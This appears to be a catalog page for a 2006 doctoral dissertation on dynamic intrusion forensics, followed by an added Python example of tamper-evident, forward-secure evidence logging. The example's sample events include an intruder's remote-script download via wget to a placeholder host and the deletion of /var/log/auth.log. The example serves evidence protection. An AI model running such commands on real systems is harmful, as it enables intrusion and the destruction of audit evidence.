Research on Key Technologies of Computer Intrusion Forensics

(English title as published: The Key Technology Research on Computer Intrusion Forensics)

[Author] 綦朝晖 (Qi Zhaohui)

[Supervisor] 孙济洲 (Sun Jizhou)

[Degree information] Tianjin University, Computer Application Technology, 2006, PhD

[Abstract] In recent years the number of computer network crime cases has risen sharply, and computer network crime has become a widespread international problem. The key to fighting it is obtaining sufficient, reliable electronic evidence that has legal force; computer forensics has therefore attracted growing attention and become a research focus in computer network security. Digital information, being a sequence of 0s and 1s, is easily modified, and this fragility is what makes computer evidence hard to authenticate. This dissertation studies several key problems in computer intrusion forensics. It first discusses the legal issues involved in admitting computer data as evidence, then surveys the state of computer forensics research and analyses it from two distinct perspectives, static and dynamic. On that basis it formulates the idea of dynamic forensics: moving potential evidence of a crime to a safe place before and during an intrusion, rather than only afterwards. The position taken is that a good forensic method protects potential evidence in real time and then carries out the concrete investigation after the event. A theoretical model for protecting forensic information, the DT-BLP security model, together with a scheme for applying it in practice, is proposed; it provides a theoretical and practical basis for designing forensic-information protection systems, makes it possible to protect evidence before and during an intrusion, and greatly reduces the intruder's opportunity to destroy evidence of the crime at those stages. Data integrity has always been a difficult point in authenticating computer evidence; the forensic-information consistency algorithm proposed here gives strict technical protection of the integrity of forensic information gathered before and during an intrusion. As a forensic system runs, the volume of collected forensic information keeps growing, while the genuine evidence of intrusion is likely to be only a tiny (though crucial) fraction of it, so the large proportion of normal information must be filtered out to allow probable evidence to be retained for a long time. For this the dissertation proposes a fuzzy risk evaluation algorithm that scores the risk of every forensic record and selects records on that basis, retaining those that may reflect the intruder's behaviour. Finally, it presents the design and implementation of a software prototype that integrates these results, a host-based dynamic forensics system, covering the functional requirements analysis and detailed design produced during development, and evaluates the system's performance.
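The abstract states the aim of dynamic forensics, protecting potential evidence in real time before and during an intrusion so the intruder cannot quietly destroy it, but does not describe the DT-BLP model or the consistency algorithm themselves. The Python example below is added here to show that aim in working code; it is not the dissertation's algorithm and is not taken from the page. It assumes a host-side logger that chains each forensic record to the previous one with an HMAC, evolves its key one-way after every record, and ships records to a separate collector that holds the initial key. The sample events, the keys and the names `EvidenceLogger` and `verify_chain` are all constructed for this illustration.

```python
"""Forward-secure, hash-chained evidence records (added illustration)."""
import hashlib
import hmac
import json


def _canonical(seq, event):
    # Deterministic serialization so the MAC covers exactly one byte string.
    return json.dumps({"seq": seq, "event": event}, sort_keys=True,
                      separators=(",", ":")).encode()


def _mac(key, prev_mac, seq, event):
    # Each MAC binds the record to its predecessor, so the chain cannot be reordered.
    return hmac.new(key, prev_mac + _canonical(seq, event), hashlib.sha256).digest()


def _evolve(key):
    # One-way key update: holding key_{i+1} reveals nothing about key_i.
    return hashlib.sha256(b"evolve|" + key).digest()


class EvidenceLogger:
    """Host-side writer. Holds only the *current* key; past keys are discarded."""

    def __init__(self, initial_key):
        self._key = initial_key
        self._prev = b"\x00" * 32
        self._seq = 0
        self.entries = []          # what gets shipped to the collector

    def append(self, event):
        mac = _mac(self._key, self._prev, self._seq, event)
        self.entries.append({"seq": self._seq, "event": event, "mac": mac.hex()})
        self._prev = mac
        self._seq += 1
        self._key = _evolve(self._key)   # old key is now unrecoverable on the host
        return mac.hex()

    @property
    def current_key(self):
        # Exposed only to simulate an intruder who seizes the host's key material.
        return self._key


def verify_chain(entries, initial_key, expected_count=None):
    """Collector-side check. Returns (ok, index of first bad entry or None)."""
    key, prev = initial_key, b"\x00" * 32
    for i, entry in enumerate(entries):
        if entry["seq"] != i:
            return False, i                  # gap or reorder: a record was removed
        expected = _mac(key, prev, i, entry["event"])
        if not hmac.compare_digest(expected.hex(), entry["mac"]):
            return False, i                  # modified or forged record
        prev, key = expected, _evolve(key)
    if expected_count is not None and len(entries) != expected_count:
        return False, len(entries)           # tail truncated
    return True, None


# Constructed sample events (not taken from the dissertation).
SAMPLE_EVENTS = [
    {"t": "2006-01-01T00:00:01", "src": "sshd", "msg": "Accepted password for root from 10.0.0.5"},
    {"t": "2006-01-01T00:00:07", "src": "sudo", "msg": "root : COMMAND=/bin/bash"},
    {"t": "2006-01-01T00:00:09", "src": "audit", "msg": "execve /usr/bin/wget http://example.invalid/k.sh"},
    {"t": "2006-01-01T00:00:10", "src": "audit", "msg": "unlink /var/log/auth.log"},
]


def demo():
    k0 = b"\x01" * 32                        # assumed shared with the collector at deployment
    log = EvidenceLogger(k0)
    for ev in SAMPLE_EVENTS:
        log.append(ev)
    intact = verify_chain(log.entries, k0, expected_count=4)

    # An intruder who now owns the host rewrites record 1 and re-MACs it with
    # the only key still on the box (key_4); the collector still rejects it.
    forged = [dict(e) for e in log.entries]
    forged[1]["event"] = {**forged[1]["event"], "msg": "Failed password for root from 10.0.0.5"}
    prev = bytes.fromhex(forged[0]["mac"])
    forged[1]["mac"] = _mac(log.current_key, prev, 1, forged[1]["event"]).hex()
    tampered = verify_chain(forged, k0, expected_count=4)

    truncated = verify_chain(log.entries[:3], k0, expected_count=4)   # last record dropped
    removed = verify_chain(log.entries[:1] + log.entries[2:], k0)     # middle record dropped
    return intact, tampered, truncated, removed


if __name__ == "__main__":
    print(demo())
```

Because the host discards each key after use, an intruder who takes over at step k obtains only key_k and cannot re-MAC records written earlier; a record deleted from the middle shows up as a sequence gap. Truncating the tail is only detected if the collector tracks how many records it expects (the `expected_count` parameter), which is why the count, like the initial key, must live on the collector and not on the monitored host. This models the "transfer to a safe place" idea in the abstract; if the collector runs on the compromised host itself, the protection is lost.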

  • [Online publication submitter] Tianjin University
  • [Online publication year/issue] 2007, Issue 02
  • [CLC number] TP393.08
  • [Cited by] 13
  • [Downloads] 1359